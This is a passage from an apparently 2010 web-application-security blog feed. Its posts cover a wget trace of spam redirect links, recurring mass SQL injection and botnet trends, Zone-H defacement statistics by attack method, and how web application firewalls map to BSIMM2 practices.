[following]</div><div>--2010-06-21 14:18:45-- https://www.donanza.com/publishers?utm_source=twitter&utm_medium=pbl&utm_campaign=cpb</div><div>Resolving www.donanza.com... 74.55.224.82</div><div>Connecting to www.donanza.com|74.55.224.82|:443... connected.</div><div>HTTP request sent, awaiting response... 200 OK</div><div>Length: unspecified [text/html]</div><div>Saving to: `publishers?utm_source=twitter&utm_medium=pbl&utm_campaign=cpb'</div><div><br /></div><div> [ <=> ] 11,236 --.-K/s in 0.1s </div><div><br /></div><div>2010-06-21 14:18:46 (99.4 KB/s) - `publishers?utm_source=twitter&utm_medium=pbl&utm_campaign=cpb' saved [11236]</div></blockquote><div></div></div><div>It seems as though the purpose of these Spam links/accounts is to do some affiliate or click schemes.</div>Ryan Barnetthttp://www.blogger.com/profile/12300602630139148313noreply@blogger.com3tag:blogger.com,1999:blog-5361523904237597206.post-35618931976590685422010-06-15T16:07:00.006-04:002010-06-15T16:42:02.908-04:00Back to the Future - Economies of Scale Techniques from 2008 Still in Use Today<span style="font-style:italic;">Submitted by Ryan Barnett 6/15/2010</span><br /><br /><div>What is old is new again... While tracking a number of recent stories for the <a href="http://projects.webappsec.org/Web-Hacking-Incident-Database">WASC Web Hacking Incident Database (WHID) Project</a>, I noticed a striking trend - <i><b>many of the current attack trends (<a href="http://tacticalwebappsec.blogspot.com/2008/01/mass-sql-injection-attacks-infect.html">Mass SQL Injection Bot attacks</a>, <a href="http://tacticalwebappsec.blogspot.com/2010/05/botnet-herders-targeting-web-servers.html">Botnet Herding of Web servers for DDoS</a> and targeted attacks against Service/Hosting Providers), we actually first highlighted back in 2008</b></i>. </div><div><br /></div><div>Here are a few recent WHID entries for these three issues -</div><div><br /></div><div><span class="Apple-style-span" style=" border-collapse: collapse; -webkit-border-horizontal-spacing: 2px; -webkit-border-vertical-spacing: 2px; font-family:'Lucida Grande', Tahoma, Verdana, sans-serif;"><span class="Apple-style-span" style="font-size:medium;"><a href="https://wasc-whid.dabbledb.com/page/wasc-whid/dXhcaNXd?filter33485=&filter33487=2010-115&filter33477=&filter38336=&filter46769=&filter33483=&filter33473=&filter33465=&filter33467=&filter33469=&filter33471=&filter33475=&filter33479=&filter33481=&filter35431=#/////filter33487:MjAxMC0xMTU=//////////">WHID 2010-115: Mass hack plants malware on thousands of webpages</a></span></span></div><div><span class="Apple-style-span" style=" border-collapse: collapse; -webkit-border-horizontal-spacing: 2px; -webkit-border-vertical-spacing: 2px; font-family:'Lucida Grande', Tahoma, Verdana, sans-serif;"><span class="Apple-style-span" style="font-size:medium;"><a href="https://wasc-whid.dabbledb.com/page/wasc-whid/dXhcaNXd?filter33485=&filter33487=2010-123&filter33477=&filter38336=&filter46769=&filter33483=&filter33473=&filter33465=&filter33467=&filter33469=&filter33471=&filter33475=&filter33479=&filter33481=&filter35431=#/////filter33487:MjAxMC0xMjM=//////////">WHID 2010-123: Botnet hijacks web servers for DDoS campaign</a></span></span></div><div><span class="Apple-style-span" style=" border-collapse: collapse; -webkit-border-horizontal-spacing: 2px; -webkit-border-vertical-spacing: 2px; font-family:'Lucida Grande', Tahoma, Verdana, sans-serif;"><span class="Apple-style-span" style="font-size:medium;"><a href="https://wasc-whid.dabbledb.com/page/wasc-whid/dXhcaNXd?filter33485=&filter33487=&filter33477=&filter38336=&filter46769=&filter33483=&filter33473=&filter33465=&filter33467=&filter33469=&filter33471=&filter33475=&filter33479=&filter33481=&filter35431=#///////////////">WHID 2010-122: Attack of WordPress Blogs on Rackspace</a></span></span></div><div><br /></div><div>We highlighted these three specific attack methodologies in the 2008 WHID Report in the "Economies of Scale" section at the end of the the following OWASP AppSec WHID presentation given by Ofer Shezaf. Pay particular attention to the last 10 minutes as all three of these techniques are still relevant today.</div><div><br /><embed id="VideoPlayback" src="http://video.google.com/googleplayer.swf?docid=1130960689238372157&hl=en&fs=true" style="width:400px;height:326px" allowfullscreen="true" allowscriptaccess="always" type="application/x-shockwave-flash"></embed><br /></div><div><br /></div>Ryan Barnetthttp://www.blogger.com/profile/12300602630139148313noreply@blogger.com0tag:blogger.com,1999:blog-5361523904237597206.post-4571185334530745622010-06-04T10:28:00.006-04:002010-06-04T11:06:28.359-04:00Zone-H Defacement Statistics Report for Q1 2010<meta equiv="content-type" content="text/html; charset=utf-8"><em>Submitted by Ryan Barnett 6/4/2010</em>
<br />
<br />Web defacements are a serious problem and are a critical barometer for estimating exploitable vulnerabilities in websites. Unfortunately, most people focus too much on the impact or outcome of these attacks (the defacement) rather than the fact that their web applications are vulnerable to this level of exploitation. People are forgetting the standard Risk equation -
<br /><span style="font-weight: bold; "><blockquote></blockquote><blockquote></blockquote>RISK = THREAT x VULNERABILITY x IMPACT</span>
<br />
<br />The resulting risk of a web defacement might be low because the the impact may not be deemed a high enough severity for particular organizations. What most people are missing, however, is that the threat and vulnerability components of the equation still exist. What happens if the defacers decided to not simply alter some homepage content and instead decided to do something more damaging such as adding malicious code to infect clients?
<br />
<br /><span style="font-weight: bold; ">Zone-H Statistics Report for 2008-2009-Q1 2010</span>
<br /><a href="http://www.zone-h.org/">Zone-H</a> is a clearing house that has been tracking web defacements for a number of years. At the end of May 2010, they released <a href="http://www.zone-h.org/news/id/4735">a statistics report which correlated data from 2008, 2009 and the first quarter of 2010</a>. This report revealed some very interesting numbers.
<br />
<br /><span style="font-weight: bold; ">What Attacks Were Being Used?</span>
<br />The first piece of data that was interesting to me was the table which listed the various attacks that were successfully employed which resulted in enough system access to alter the web site content.
<br />
<br /><div><span class="Apple-style-span" style="font-family: verdana; font-size: 14px; "><table bordercolor="#c8c8c8" border="1" align="center"><tbody><tr><td align="center"><span style="font-size: smaller; "> Attack Method</span></td><td><span style="font-size: smaller; "> Total 2008</span></td><td><span style="font-size: smaller; "> Total 2009</span></td><td><span style="font-size: smaller; "><span style="color: rgb(255, 0, 0); "> Total 2010
<br /></span></span></td></tr><tr><td><span style="font-size: smaller; "> Attack against the administrator/user (password stealing/sniffing)</span></td><td><span style="font-size: smaller; "> 33.141</span></td><td><span style="font-size: smaller; "> 24.386</span></td><td><span style="font-size: smaller; "> <span style="color: rgb(255, 0, 0); ">10.918</span></span></td></tr><tr><td><span style="font-size: smaller; "> Shares misconfiguration </span></td><td><span style="font-size: smaller; "> 72.192</span></td><td><span style="font-size: smaller; "> 87.313</span></td><td><span style="font-size: smaller; "> <span style="color: rgb(255, 0, 0); ">55.725</span></span></td></tr><tr><td><span style="font-size: smaller; "> File Inclusion </span></td><td><span style="font-size: smaller; "> 90.801</span></td><td><span style="font-size: smaller; "> 95.405</span></td><td><span style="font-size: smaller; "> <span style="color: rgb(255, 0, 0); ">115.574</span></span></td></tr><tr><td><span style="font-size: smaller; "> SQL Injection </span></td><td><span style="font-size: smaller; "> 32.275</span></td><td><span style="font-size: smaller; "> 57.797</span></td><td><span style="font-size: smaller; "> <span style="color: rgb(255, 0, 0); ">33.920</span></span></td></tr><tr><td><span style="font-size: smaller; "> Access credentials through Man In the Middle attack </span></td><td><span style="font-size: smaller; "> 37.526</span></td><td><span style="font-size: smaller; "> 7.385</span></td><td><span style="font-size: smaller; "> <span style="color: rgb(255, 0, 0); ">1.005</span></span></td></tr><tr><td><span style="font-size: smaller; "> Other Web Application bug </span></td><td><span style="font-size: smaller; "> 36.832</span></td><td><span style="font-size: smaller; "> 99.546</span></td><td><span style="font-size: smaller; "> <span style="color: rgb(255, 0, 0); ">42.874</span></span></td></tr><tr><td><span style="font-size: smaller; "> FTP Server intrusion </span></td><td><span style="font-size: smaller; "> 32.521</span></td><td><span style="font-size: smaller; "> 11.749</span></td><td><span style="font-size: smaller; "> <span style="color: rgb(255, 0, 0); ">5.138</span></span></td></tr><tr><td><span style="font-size: smaller; "> Web Server intrusion </span></td><td><span style="font-size: smaller; "> 8.334</span></td><td><span style="font-size: smaller; "> 9.820</span></td><td><span style="font-size: smaller; "> <span style="color: rgb(255, 0, 0); ">7.400</span></span></td></tr><tr><td><span style="font-size: smaller; "> DNS attack through cache poisoning </span></td><td><span style="font-size: smaller; "> 7.541</span></td><td><span style="font-size: smaller; "> 3.289</span></td><td><span style="font-size: smaller; "> <span style="color: rgb(255, 0, 0); ">1.361</span></span></td></tr><tr><td><span style="font-size: smaller; "> Other Server intrusion </span></td><td><span style="font-size: smaller; "> 5.655</span></td><td><span style="font-size: smaller; "> 10.799</span></td><td><span style="font-size: smaller; "> <span style="color: rgb(255, 0, 0); ">5.123</span></span></td></tr><tr><td><span style="font-size: smaller; "> DNS attack through social engineering </span></td><td><span style="font-size: smaller; "> 6.310</span></td><td><span style="font-size: smaller; "> 2.847</span></td><td><span style="font-size: smaller; "> <span style="color: rgb(255, 0, 0); ">1.358</span></span></td></tr><tr><td><span style="font-size: smaller; "> URL Poisoning </span></td><td><span style="font-size: smaller; "> 5.970</span></td><td><span style="font-size: smaller; "> 6.294</span></td><td><span style="font-size: smaller; "> <span style="color: rgb(255, 0, 0); ">3.516</span></span></td></tr><tr><td><span style="font-size: smaller; "> Web Server external module intrusion </span></td><td><span style="font-size: smaller; "> 4.967</span></td><td><span style="font-size: smaller; "> 2.265</span></td><td><span style="font-size: smaller; "> <span style="color: rgb(255, 0, 0); ">1.313</span></span></td></tr><tr><td><span style="font-size: smaller; "> Remote administrative panel access through bruteforcing </span></td><td><span style="font-size: smaller; "> 9.991</span></td><td><span style="font-size: smaller; "> 6.862</span></td><td><span style="font-size: smaller; "> <span style="color: rgb(255, 0, 0); ">7.046</span></span></td></tr><tr><td><span style="font-size: smaller; "> Rerouting after attacking the Firewall </span></td><td><span style="font-size: smaller; "> 8.143</span></td><td><span style="font-size: smaller; "> 3.107</span></td><td><span style="font-size: smaller; "> <span style="color: rgb(255, 0, 0); ">1.267</span></span></td></tr><tr><td><span style="font-size: smaller; "> SSH Server intrusion </span></td><td><span style="font-size: smaller; "> 6.231</span></td><td><span style="font-size: smaller; "> 4.624</span></td><td><span style="font-size: smaller; "> <span style="color: rgb(255, 0, 0); ">4.550</span></span></td></tr><tr><td><span style="font-size: smaller; "> RPC Server intrusion </span></td><td><span style="font-size: smaller; "> 12.359</span></td><td><span style="font-size: smaller; "> 5.821</span></td><td><span style="font-size: smaller; "> <span style="color: rgb(255, 0, 0); ">2.512</span></span></td></tr><tr><td><span style="font-size: smaller; "> Rerouting after attacking the Router </span></td><td><span style="font-size: smaller; "> 9.170</span></td><td><span style="font-size: smaller; "> 2.671</span></td><td><span style="font-size: smaller; "> <span style="color: rgb(255, 0, 0); ">1.327</span></span></td></tr><tr><td><span style="font-size: smaller; "> Remote service password guessing</span></td><td><span style="font-size: smaller; "> 6.641</span></td><td><span style="font-size: smaller; "> 3.252</span></td><td><span style="font-size: smaller; "> <span style="color: rgb(255, 0, 0); ">1.103</span></span></td></tr><tr><td><span style="font-size: smaller; "> Telnet Server intrusion </span></td><td><span style="font-size: smaller; "> 4.050</span></td><td><span style="font-size: smaller; "> 3.476</span></td><td><span style="font-size: smaller; "> <span style="color: rgb(255, 0, 0); ">2.562</span></span></td></tr><tr><td><span style="font-size: smaller; "> Remote administrative panel access through password guessing </span></td><td><span style="font-size: smaller; "> 4.915</span></td><td><span style="font-size: smaller; "> 1.139</span></td><td><span style="font-size: smaller; "> <span style="color: rgb(255, 0, 0); ">422</span></span></td></tr><tr><td><span style="font-size: smaller; "> Remote administrative panel access through social engineering </span></td><td><span style="font-size: smaller; "> 4.431</span></td><td><span style="font-size: smaller; "> 1.502</span></td><td><span style="font-size: smaller; "> <span style="color: rgb(255, 0, 0); ">472</span></span></td></tr><tr><td><span style="font-size: smaller; "> Remote service password bruteforce </span></td><td><span style="font-size: smaller; "> 5.563</span></td><td><span style="font-size: smaller; "> 3.658</span></td><td><span style="font-size: smaller; "> <span style="color: rgb(255, 0, 0); ">1.002</span></span></td></tr><tr><td><span style="font-size: smaller; "> Mail Server intrusion </span></td><td><span style="font-size: smaller; "> 1.441</span></td><td><span style="font-size: smaller; "> 2.314</span></td><td><span style="font-size: smaller; "> <span style="color: rgb(255, 0, 0); ">1.121</span></span></td></tr><tr><td><span style="font-size: smaller; ">Not available</span></td><td><span style="font-size: smaller; "> 70.457</span></td><td><span style="font-size: smaller; "> 87.684</span></td><td><span style="font-size: smaller; "> <span style="color: rgb(255, 0, 0); ">24.493
<br />
<br /></span></span></td></tr></tbody></table></span><div>
<br /><span style="font-weight: bold; ">Lesson Learned #1 - Web Security Goes Beyond Securing the Web Application Itself</span>
<br />The first concept that was re-enforced was the fact that the majority of attack vectors had absolutely nothing at all to do with the web application itself. The attackers exploited other services that were installed (such as FTP or SSH) or even DNS cache poisoning which would give the "illusion" that the real website had been defaced. These defacement statistics should be a wake-up call for organizations to truly embrace defense-in-depth security and re-evaluate their network and host-level security posture.
<br />
<br /><span style="font-weight: bold; ">Lesson Learned #2 - Vulnerability Prevalence Statistics vs. Attack Vectors used in Compromises</span>
<br />There are many community projects and resources available that track web vulnerabilities such as; <a href="http://www.securityfocus.com/archive/1">Bugtraq</a>, <a href="http://cve.mitre.org/">CVE</a> and <a href="http://osvdb.org/">OSVDB</a>. These are tremendously useful tools for gaging the raw numbers of vulnerabilities that exist in public and commercial web software. Additionally, a project such as the <a href="http://projects.webappsec.org/Web-Application-Security-Statistics">WASC Web Application Security Statistics Project</a> which provides further information about vulnerabilities that are remotely exploitable in both public and custom code applications is useful data. All of this data helps to define both the overall attack surfaces available to attackers and the Vulnerability component of the RISK equation mentioned earlier. This information shows what <b><i>COULD</i></b> be exploited however there must be a threat (attacker) and a desired outcome (such as a website defacement). The data shown in this report should help organizations to prioritize the remediation of these specific attack vectors.
<br />
<br /><span style="font-weight: bold; ">Lesson Learned #3 - Web Defacers Are Migrating To Installing Malicious Code</span>
<br />Another interesting trend is emerging with regards to web defacements - addition of planting of malicious code. Professional criminal elements of cyberspace (Russian Business Network, etc...) have recruited web defacers into doing "contract" work. Essentially the web defacers already have access to systems so they have a service to offer. It used to be that the web site data itself was the only thing of value, however, now we are seeing that using legitimate websites as a malware hosting platform is providing massive scale improvements for infecting users. So, instead of overtly altering website content and proclaim their 3l33t hax0r ski77z to the world, they are rather quietly adding malicious javascript code to the sites and are making money from criminal organizations and/or malware advertisers by infecting home computer users.</div><div>
<br />Zone-H outlines this concept at the beginning of their report:</div></div><div><span class="Apple-style-span" style="font-family: verdana; font-size: 14px; "><blockquote><i>Worms and viruses like mpack/zeus variants also allow some crackers to gather ftp account credentials, <b>but most of the people using those tools do not deface websites, but prefer to backdoor those sites with iframe exploits in order to hack more and more users, and to steal data from them.</b> </i><a target="_blank" href="http://zone-h.org/archive/notifier=iskorpitx" style="color: rgb(243, 11, 11); "><i>Iskorpitx</i></a><i> for example (but many others do it as well) uses this method to break into hostings, he usually steals credentials with viruses and sometimes even backdoors the defacements for visitors of the defaced sites to be exploited.</i></blockquote></span></div><div>
<br /></div>Ryan Barnetthttp://www.blogger.com/profile/12300602630139148313noreply@blogger.com0tag:blogger.com,1999:blog-5361523904237597206.post-29371758451605029032010-05-27T11:51:00.011-04:002010-06-18T20:46:37.564-04:00BSIMM2 and WAFs<a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_E0YEPhKPc2k/S_6WPW83hrI/AAAAAAAAAIM/_Z4ZOzE-leU/s1600/223fig01_alt.jpg"><img style="float:right; margin:0 0 10px 10px;cursor:pointer; cursor:hand;width: 320px; height: 174px;" src="http://1.bp.blogspot.com/_E0YEPhKPc2k/S_6WPW83hrI/AAAAAAAAAIM/_Z4ZOzE-leU/s320/223fig01_alt.jpg" border="0" alt="" id="BLOGGER_PHOTO_ID_5475979387532183218" /></a><br /><b><i>Submitted by Ryan Barnett 05/27/2010</i></b><div><b><i><br /></i></b><br />You may have heard that the <a href="http://bsimm2.com/online/">Build Security In Maturity Model (BSIMM) version 2</a> was <a href="http://www.informit.com/articles/article.aspx?p=1592389">recently released</a> which helps to document various software security practices that are employed by organizations to help prevent application vulnerabilities. OWASP also has a similar project with its <a href="http://www.owasp.org/index.php/Category:Software_Assurance_Maturity_Model">Open Software Assurance Maturity model (OpenSAMM)</a>.</div><div><br /></div><div>I was recently asked by a prospect how a Web Application Firewall fits into these security models and I realized that this was properly documented anywhere. Here are a few direct mappings that I came up with.</div><div><br /></div><div><b>Deployment Phase</b></div><div>The main benefit of a WAF is that it is able to monitor the web application in real-time, in production. This addresses some of the limitations of static application assessment tools (SAST) and dynamic application assessment tools (DAST).</div><div><br /></div><div>BSIMM2 lists the following table to describe <a href="http://bsimm2.com/online/deployment/se/">Deployment: Software Environment</a> items:</div><div><br /></div><div><span class="Apple-style-span" style=" line-height: 20px; font-family:Cambria, 'Hoefler Text', Utopia, 'Liberation Serif', 'Nimbus Roman No9 L Regular', Times, 'Times New Roman', serif;font-size:15px;"><table cellspacing="0" cellpadding="0" style="border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(102, 102, 102); border-right-color: rgb(102, 102, 102); border-bottom-color: rgb(102, 102, 102); border-left-color: rgb(102, 102, 102); width: 754px; margin-top: auto; margin-right: auto; margin-bottom: 25px; margin-left: auto; "><tbody><tr style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; "><th colspan="4" style="background-color: rgb(221, 221, 221); border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(170, 170, 170); border-right-color: rgb(170, 170, 170); border-bottom-color: rgb(170, 170, 170); border-left-color: rgb(170, 170, 170); ">DEPLOYMENT: SOFTWARE ENVIRONMENT<br />OS and platform patching, Web application firewalls, installation and configuration documentation, application monitoring, change management, code signing.</th></tr><tr style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; "><th style="background-color: rgb(221, 221, 221); border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(170, 170, 170); border-right-color: rgb(170, 170, 170); border-bottom-color: rgb(170, 170, 170); border-left-color: rgb(170, 170, 170); "> </th><th style="background-color: rgb(221, 221, 221); border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(170, 170, 170); border-right-color: rgb(170, 170, 170); border-bottom-color: rgb(170, 170, 170); border-left-color: rgb(170, 170, 170); ">Objective</th><th style="background-color: rgb(221, 221, 221); border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(170, 170, 170); border-right-color: rgb(170, 170, 170); border-bottom-color: rgb(170, 170, 170); border-left-color: rgb(170, 170, 170); ">Activity</th><th style="background-color: rgb(221, 221, 221); border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(170, 170, 170); border-right-color: rgb(170, 170, 170); border-bottom-color: rgb(170, 170, 170); border-left-color: rgb(170, 170, 170); ">Level</th></tr><tr style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; "><td style="border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(170, 170, 170); border-right-color: rgb(170, 170, 170); border-bottom-color: rgb(170, 170, 170); border-left-color: rgb(170, 170, 170); margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 3px; padding-right: 3px; padding-bottom: 3px; padding-left: 3px; "><a href="http://bsimm2.com/online/deployment/se/?s=se1.1#se1.1" style="color: rgb(16, 30, 171); display: block; width: 35px; text-decoration: none; ">SE1.1</a></td><td style="border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(170, 170, 170); border-right-color: rgb(170, 170, 170); border-bottom-color: rgb(170, 170, 170); border-left-color: rgb(170, 170, 170); margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 3px; padding-right: 3px; padding-bottom: 3px; padding-left: 3px; "><a href="http://bsimm2.com/online/deployment/se/?s=se1.1#se1.1" style="color: rgb(16, 30, 171); display: block; width: 378px; text-decoration: none; ">watch software</a></td><td style="border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(170, 170, 170); border-right-color: rgb(170, 170, 170); border-bottom-color: rgb(170, 170, 170); border-left-color: rgb(170, 170, 170); margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 3px; padding-right: 3px; padding-bottom: 3px; padding-left: 3px; "><a href="http://bsimm2.com/online/deployment/se/?s=se1.1#se1.1" style="color: rgb(16, 30, 171); display: block; width: 278px; text-decoration: none; ">use application input monitoring</a></td><td rowspan="2" valign="top" style="border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(170, 170, 170); border-right-color: rgb(170, 170, 170); border-bottom-color: rgb(170, 170, 170); border-left-color: rgb(170, 170, 170); margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 3px; padding-right: 3px; padding-bottom: 3px; padding-left: 3px; "><a href="http://bsimm2.com/online/deployment/se/?l=1#1" style="color: rgb(16, 30, 171); display: block; width: 31px; text-decoration: none; ">1</a></td></tr><tr style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; "><td style="border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(170, 170, 170); border-right-color: rgb(170, 170, 170); border-bottom-color: rgb(170, 170, 170); border-left-color: rgb(170, 170, 170); margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 3px; padding-right: 3px; padding-bottom: 3px; padding-left: 3px; "><a href="http://bsimm2.com/online/deployment/se/?s=se1.2#se1.2" style="color: rgb(16, 30, 171); display: block; width: 35px; text-decoration: none; ">SE1.2</a></td><td style="border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(170, 170, 170); border-right-color: rgb(170, 170, 170); border-bottom-color: rgb(170, 170, 170); border-left-color: rgb(170, 170, 170); margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 3px; padding-right: 3px; padding-bottom: 3px; padding-left: 3px; "><a href="http://bsimm2.com/online/deployment/se/?s=se1.2#se1.2" style="color: rgb(16, 30, 171); display: block; width: 378px; text-decoration: none; ">provide a solid host/network foundation for software</a></td><td style="border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(170, 170, 170); border-right-color: rgb(170, 170, 170); border-bottom-color: rgb(170, 170, 170); border-left-color: rgb(170, 170, 170); margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 3px; padding-right: 3px; padding-bottom: 3px; padding-left: 3px; "><a href="http://bsimm2.com/online/deployment/se/?s=se1.2#se1.2" style="color: rgb(16, 30, 171); display: block; width: 278px; text-decoration: none; ">ensure host/network security basics in place</a></td></tr><tr style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; "><td style="border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(170, 170, 170); border-right-color: rgb(170, 170, 170); border-bottom-color: rgb(170, 170, 170); border-left-color: rgb(170, 170, 170); margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 3px; padding-right: 3px; padding-bottom: 3px; padding-left: 3px; "><a href="http://bsimm2.com/online/deployment/se/?s=se2.2#se2.2" style="color: rgb(16, 30, 171); display: block; width: 35px; text-decoration: none; ">SE2.2</a></td><td style="border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(170, 170, 170); border-right-color: rgb(170, 170, 170); border-bottom-color: rgb(170, 170, 170); border-left-color: rgb(170, 170, 170); margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 3px; padding-right: 3px; padding-bottom: 3px; padding-left: 3px; "><a href="http://bsimm2.com/online/deployment/se/?s=se2.2#se2.2" style="color: rgb(16, 30, 171); display: block; width: 378px; text-decoration: none; ">guide operations on application needs</a></td><td style="border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(170, 170, 170); border-right-color: rgb(170, 170, 170); border-bottom-color: rgb(170, 170, 170); border-left-color: rgb(170, 170, 170); margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 3px; padding-right: 3px; padding-bottom: 3px; padding-left: 3px; "><a href="http://bsimm2.com/online/deployment/se/?s=se2.2#se2.2" style="color: rgb(16, 30, 171); display: block; width: 278px; text-decoration: none; ">publish installation guides created by SSDL</a></td><td rowspan="3" valign="top" style="border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(170, 170, 170); border-right-color: rgb(170, 170, 170); border-bottom-color: rgb(170, 170, 170); border-left-color: rgb(170, 170, 170); margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 3px; padding-right: 3px; padding-bottom: 3px; padding-left: 3px; "><a href="http://bsimm2.com/online/deployment/se/?l=2#2" style="color: rgb(16, 30, 171); display: block; width: 31px; text-decoration: none; ">2</a></td></tr><tr style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; "><td style="border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(170, 170, 170); border-right-color: rgb(170, 170, 170); border-bottom-color: rgb(170, 170, 170); border-left-color: rgb(170, 170, 170); margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 3px; padding-right: 3px; padding-bottom: 3px; padding-left: 3px; "><a href="http://bsimm2.com/online/deployment/se/?s=se2.3#se2.3" style="color: rgb(16, 30, 171); display: block; width: 35px; text-decoration: none; ">SE2.3</a></td><td style="border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(170, 170, 170); border-right-color: rgb(170, 170, 170); border-bottom-color: rgb(170, 170, 170); border-left-color: rgb(170, 170, 170); margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 3px; padding-right: 3px; padding-bottom: 3px; padding-left: 3px; "><a href="http://bsimm2.com/online/deployment/se/?s=se2.3#se2.3" style="color: rgb(16, 30, 171); display: block; width: 378px; text-decoration: none; ">watch software</a></td><td style="border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(170, 170, 170); border-right-color: rgb(170, 170, 170); border-bottom-color: rgb(170, 170, 170); border-left-color: rgb(170, 170, 170); margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 3px; padding-right: 3px; padding-bottom: 3px; padding-left: 3px; "><a href="http://bsimm2.com/online/deployment/se/?s=se2.3#se2.3" style="color: rgb(16, 30, 171); display: block; width: 278px; text-decoration: none; ">use application behavior monitoring and diagnostics</a></td></tr><tr style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; "><td style="border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(170, 170, 170); border-right-color: rgb(170, 170, 170); border-bottom-color: rgb(170, 170, 170); border-left-color: rgb(170, 170, 170); margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 3px; padding-right: 3px; padding-bottom: 3px; padding-left: 3px; "><a href="http://bsimm2.com/online/deployment/se/?s=se2.4#se2.4" style="color: rgb(16, 30, 171); display: block; width: 35px; text-decoration: none; ">SE2.4</a></td><td style="border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(170, 170, 170); border-right-color: rgb(170, 170, 170); border-bottom-color: rgb(170, 170, 170); border-left-color: rgb(170, 170, 170); margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 3px; padding-right: 3px; padding-bottom: 3px; padding-left: 3px; "><a 